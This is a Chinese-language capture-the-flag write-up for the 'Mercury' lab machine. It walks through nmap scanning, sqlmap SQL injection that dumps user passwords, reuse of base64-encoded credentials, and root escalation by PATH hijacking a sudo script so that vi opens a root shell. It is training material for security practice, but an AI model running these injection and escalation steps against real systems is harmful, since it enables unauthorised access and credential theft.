Mercury
👅

Mercury

Published
April 2, 2023
Category
Write-Up
Subcategory
漏洞利用与攻击技术
Tags
SQL注入
Linux
Author
HZH
Notes

信息搜集

先使用nmap来探查下目标主机上的端口开放情况
└─# nmap -sS -Pn 10.192.95.85 Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 14:12 CST Nmap scan report for 10.192.95.85 Host is up (0.0017s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds
再对20和80端口上的服务做更细致的探测
└─# nmap -sT -A -p 22,8080 -sV -oN Mercury.txt 10.192.95.85 Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 14:14 CST Nmap scan report for 10.192.95.85 Host is up (0.00075s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA) | 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA) |_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519) 8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2 |_http-title: Site doesn't have a title (text/html; charset=utf-8). | http-robots.txt: 1 disallowed entry |_/ | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Date: Sun, 02 Apr 2023 06:14:30 GMT | Server: WSGIServer/0.2 CPython/3.8.2 | Content-Type: text/html | X-Frame-Options: DENY | Content-Length: 2366 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | <!DOCTYPE html> | <html lang="en"> | <head> | <meta http-equiv="content-type" content="text/html; charset=utf-8"> | <title>Page not found at /nice ports,/Trinity.txt.bak</title> | <meta name="robots" content="NONE,NOARCHIVE"> | <style type="text/css"> | html * { padding:0; margin:0; } | body * { padding:10px 20px; } | body * * { padding:0; } | body { font:small sans-serif; background:#eee; color:#000; } | body>div { border-bottom:1px solid #ddd; } | font-weight:normal; margin-bottom:.4em; } | span { font-size:60%; color:#666; font-weight:normal; } | table { border:none; border-collapse: collapse; width:100%; } | vertical-align: | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Date: Sun, 02 Apr 2023 06:14:30 GMT | Server: WSGIServer/0.2 CPython/3.8.2 | Content-Type: text/html; charset=utf-8 | X-Frame-Options: DENY | Content-Length: 69 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | Hello. This site is currently in development please check back later. | RTSPRequest: | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 400</p> | <p>Message: Bad request version ('RTSP/1.0').</p> | <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p> | </body> |_ </html> |_http-server-header: WSGIServer/0.2 CPython/3.8.2 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.92%I=7%D=4/2%Time=64291D49%P=x86_64-pc-linux-gnu%r(Get SF:Request,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2002\x20Apr\x2020 SF:23\x2006:14:30\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.2\ SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x20 SF:DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r\n SF:Referrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\x2 SF:0currently\x20in\x20development\x20please\x20check\x20back\x20later\.") SF:%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2002\x20Ap SF:r\x202023\x2006:14:30\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3 SF:\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Optio SF:ns:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosn SF:iff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x SF:20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20la SF:ter\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD SF:\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\. SF:w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\x SF:20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20conte SF:nt=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title SF:>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<b SF:ody>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20\ SF:x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\x SF:20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/1 SF:\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expla SF:nation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x20 SF:or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n") SF:%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20 SF:Sun,\x2002\x20Apr\x202023\x2006:14:30\x20GMT\r\nServer:\x20WSGIServer/0 SF:\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Options SF::\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nosn SF:iff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<html SF:\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"\ SF:x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20not SF:\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20< SF:meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style\ SF:x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x2 SF:0margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x2020p SF:x;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x20 SF:\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee;\ SF:x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1px SF:\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:normal; SF:\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20font- SF:size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x20t SF:able\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:100 SF:%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.6 (97%), Linux 5.0 - 5.3 (96%), Linux 5.0 - 5.4 (94%), Linux 5.4 (94%), Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 2.6.32 - 3.10 (93%), Linux 5.3 - 5.4 (93%), Linux 3.4 - 3.10 (92%), Synology DiskStation Manager 5.2-5644 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using proto 1/icmp) HOP RTT ADDRESS 1 0.34 ms LAPTOP-AVRKN16D.mshome.net (172.30.96.1) 2 0.77 ms 10.192.95.85 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.81 seconds
 

网站探查

登陆到目标主机上的8080端口查看,
notion image
可以看到下列信息,我们输入admin查看一下,发现了报错信息
notion image
由于该网站在开始时,应该设置了DEBUG模式,因此我们可以从返回的报错中看到不少有用的信息,我们可以知道该网站是使用Django搭建的,并且上面还有URL模式匹配规则,里面告诉我了我们有哪些匹配路径,我们尝试使用其中的URL来查看信息,在mercuryfacts中我们可以看到下面的信息:
notion image
通过更改后面的数字,我们可以切换到不同的页面中去,从URL中可以看到,mercuryfacts 后面的数字在改变,而显示的内容也随之改变。这些URL很可能是使用数据库(例如:MYSQL)实现的,通过从数据库中查询和显示相关的数据。1Django的视图函数mercury_facts负责处理/mercuryfacts/<id>/形式的请求。在这个函数中,会从URL中解析出事实的ID。视图函数很可能会根据解析出的ID向数据库发送查询,例如:
SELECT fact FROM facts WHERE id = 1;
因此在这里,我们可以尝试使用sqlmap进行SQL注入尝试
└─# sqlmap -u "http://10.192.95.85:8080/mercuryfacts/1/" --dbs --batch --- [14:26:24] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 8 [14:26:24] [INFO] fetching database names available databases [2]: [*] information_schema [*] mercury [14:26:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.192.95.85' [14:26:24] [WARNING] your sqlmap version is outdated [*] ending @ 14:26:24 /2023-04-02/
└─# sqlmap -u "http://10.192.95.85:8080/mercuryfacts/1/" -D mercury --tables --batch --- [14:26:44] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 8 [14:26:44] [INFO] fetching tables for database: 'mercury' Database: mercury [2 tables] +-------+ | facts | | users | +-------+ [14:26:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.192.95.85' [14:26:44] [WARNING] your sqlmap version is outdated [*] ending @ 14:26:44 /2023-04-02/
└─# sqlmap -u "http://10.192.95.85:8080/mercuryfacts/1/" -D mercury -T users --dump --batch --- [14:26:56] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 8 [14:26:56] [INFO] fetching columns for table 'users' in database 'mercury' [14:26:56] [INFO] fetching entries for table 'users' in database 'mercury' Database: mercury Table: users [4 entries] +----+-------------------------------+-----------+ | id | password | username | +----+-------------------------------+-----------+ | 1 | johnny1987 | john | | 2 | lovemykids111 | laura | | 3 | lovemybeer111 | sam | | 4 | mercuryisthesizeof0.056Earths | webmaster | +----+-------------------------------+-----------+ [14:26:56] [INFO] table 'mercury.users' dumped to CSV file '/root/.local/share/sqlmap/output/10.192.95.85/dump/mercury/users.csv' [14:26:56] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.192.95.85' [14:26:56] [WARNING] your sqlmap version is outdated [*] ending @ 14:26:56 /2023-04-02
 

横向移动与权限提升

我们使用webmaster的账户和密码登陆到对应主机上去,
webmaster@mercury:~$ ls -al total 36 drwx------ 4 webmaster webmaster 4096 Sep 2 2020 . drwxr-xr-x 5 root root 4096 Aug 28 2020 .. lrwxrwxrwx 1 webmaster webmaster 9 Sep 1 2020 .bash_history -> /dev/null -rw-r--r-- 1 webmaster webmaster 220 Aug 27 2020 .bash_logout -rw-r--r-- 1 webmaster webmaster 3771 Aug 27 2020 .bashrc drwx------ 2 webmaster webmaster 4096 Aug 27 2020 .cache drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 mercury_proj -rw-r--r-- 1 webmaster webmaster 807 Aug 27 2020 .profile -rw-rw-r-- 1 webmaster webmaster 75 Sep 1 2020 .selected_editor -rw------- 1 webmaster webmaster 45 Sep 1 2020 user_flag.txt webmaster@mercury:~$ cd mercury_proj/ webmaster@mercury:~/mercury_proj$ ls -al total 28 drwxrwxr-x 5 webmaster webmaster 4096 Aug 28 2020 . drwx------ 4 webmaster webmaster 4096 Sep 2 2020 .. -rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3 -rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py drwxrwxr-x 6 webmaster webmaster 4096 Sep 1 2020 mercury_facts drwxrwxr-x 4 webmaster webmaster 4096 Aug 28 2020 mercury_index drwxrwxr-x 3 webmaster webmaster 4096 Aug 28 2020 mercury_proj -rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt webmaster@mercury:~/mercury_proj$ cat notes.txt Project accounts (both restricted): webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
我们可以发现linuxmaster的账户和显示是经过base64编码的密码字符串,通过 echo “”|base64 -d的解码后我们可以得到密码,然后使用su切换账户。
linuxmaster@mercury:~$ sudo -l [sudo] password for linuxmaster: Matching Defaults entries for linuxmaster on mercury: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User linuxmaster may run the following commands on mercury: (root : root) SETENV: /usr/bin/check_syslog.sh linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh #!/bin/bash tail -n 10 /var/log/syslog linuxmaster@mercury:~$ ln -s /bin/vi ./tail linuxmaster@mercury:~$ ls -al total 24 drwx------ 3 linuxmaster linuxmaster 4096 Apr 2 06:32 . drwxr-xr-x 5 root root 4096 Aug 28 2020 .. lrwxrwxrwx 1 linuxmaster linuxmaster 9 Sep 1 2020 .bash_history -> /dev/null -rw-r--r-- 1 linuxmaster linuxmaster 220 Aug 28 2020 .bash_logout -rw-r--r-- 1 linuxmaster linuxmaster 3771 Aug 28 2020 .bashrc drwx------ 2 linuxmaster linuxmaster 4096 Aug 28 2020 .cache -rw-r--r-- 1 linuxmaster linuxmaster 807 Aug 28 2020 .profile lrwxrwxrwx 1 linuxmaster linuxmaster 7 Apr 2 06:32 tail -> /bin/vi
在linuxmaster上,通过查看该用户的sudo权限情况,我们可以看到其可以通过root用户权限执行/usr/bin/check_syslog.sh,并且可以在执行过程中修改环境变量。
查看/usr/bin/check_syslog.sh脚本文件,我们可以看到其中使用了tail,因为我们的提权思路是在该目录下创建一个tail,并将其软链接到/bin/bin之上,这样当我们运行该脚本时,就可以使用root的权限运行/bin/vi
接着我们修改下环境变量,让其先从本目录下开始寻找匹配的可执行文件
export PATH=.:$PATH sudo --preserver-env=PATH /usr/bin/check_syslog.sh
我们将得到一个使用root权限打开的vi工具界面,然后使用!bash切换到bash界面中去,成功拿到root权限
notion image